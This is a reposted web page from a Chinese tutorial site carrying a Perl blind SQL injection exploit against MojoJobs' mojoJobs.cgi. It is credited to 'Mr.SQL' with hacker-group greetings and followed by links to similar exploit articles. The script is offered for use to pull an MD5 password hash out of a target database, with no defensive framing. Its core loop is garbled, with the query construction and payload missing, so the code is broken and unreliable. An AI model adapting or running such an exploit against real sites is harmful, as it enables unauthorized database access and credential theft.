手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoJobs Blind SQL Injection Exploit #n";

print " # (mojoJobs.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit】相关文章:

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

BYOD需要更具时效性的网络安全防护策略

Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

黑客技术之slv unpackme 脱壳

瑞星防火墙V16:可自定义防火墙规则

phpDatingClub (website.php page) Local File Inclusion Vulnerability

终端技巧 终端机常见绕过沙盘方法

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

精品推荐
分类导航